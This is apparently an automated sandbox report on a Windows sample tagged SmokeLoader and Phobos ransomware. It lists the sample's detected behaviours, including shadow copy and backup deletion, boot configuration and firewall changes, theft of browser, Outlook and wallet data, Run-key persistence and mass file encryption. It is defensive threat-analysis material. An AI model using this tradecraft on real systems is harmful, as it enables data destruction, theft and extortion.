Malware Analysis Report

2024-11-16 12:15

Sample ID 230619-nljvraee91
Target 9769c181ecef69544bbb2f974b8c0e10.exe
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
Tags
smokeloader backdoor trojan phobos collection evasion persistence ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

Threat Level: Known bad

The file 9769c181ecef69544bbb2f974b8c0e10.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos collection evasion persistence ransomware spyware stealer

SmokeLoader

Phobos

Modifies boot configuration data using bcdedit

Renames multiple (472) files with added filename extension

Deletes shadow copies

Downloads MZ/PE file

Deletes backup catalog

Blocklisted process makes network request

Modifies Windows Firewall

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Program crash

Uses Task Scheduler COM API

outlook_win_path

Suspicious behavior: MapViewOfSection

Modifies registry class

Checks SCSI registry key(s)

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Interacts with shadow copies

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-19 11:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-19 11:29

Reported

2023-06-19 11:31

Platform

win7-20230220-en

Max time kernel

150s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1356 set thread context of 1396 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A (2 identical rows)
N/A N/A N/A N/A (62 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

Network

N/A

Files

memory/1356-54-0x0000000000220000-0x0000000000235000-memory.dmp

memory/1396-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1396-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1356-57-0x0000000000250000-0x0000000000259000-memory.dmp

memory/1396-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-59-0x0000000002250000-0x0000000002266000-memory.dmp

memory/1396-60-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-64-0x000007FF63930000-0x000007FF6393A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-19 11:29

Reported

2023-06-19 11:31

Platform

win10v2004-20230220-en

Max time kernel

109s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A (4 identical rows)

Renames multiple (472) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (64 identical rows)

Deletes backup catalog

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A (2 identical rows)

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A (2 identical rows)

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\CCBD.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rhyivhytef = "\"C:\\Users\\Admin\\AppData\\Roaming\\Rhyivhytef.exe\"" C:\Users\Admin\AppData\Local\Temp\C78B.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CCBD = "C:\\Users\\Admin\\AppData\\Local\\CCBD.exe" C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CCBD = "C:\\Users\\Admin\\AppData\\Local\\CCBD.exe" C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1529757233-3489015626-3409890339-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (24 identical rows)

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libequalizer_plugin.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Styles.xbf C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmclienticon.exe.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\Microsoft.PackageManagement.ArchiverProviders.resources.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TipRes.dll.mui C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunec.jar C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODBC.DLL C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_contrast-white.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\msipc.dll.mui.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-oob.xrm-ms.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected][18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-100.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\libd3d11va_plugin.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\bootstrap.html C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail2-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\OrientationSensorCalibrationFigure.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PREVIEW.GIF.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.Model.CX.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\mscss7wre_es.dub.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-ms.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_hover_18.svg C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\bs.pak.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotContain.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\msitss55.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudt.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODEXL.DLL.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\libsmartscreen.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.DLL C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.NetFX35.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-180.png.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-ppd.xrm-ms.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main.css C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\usbitrg N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\usbitrg N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\usbitrg N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
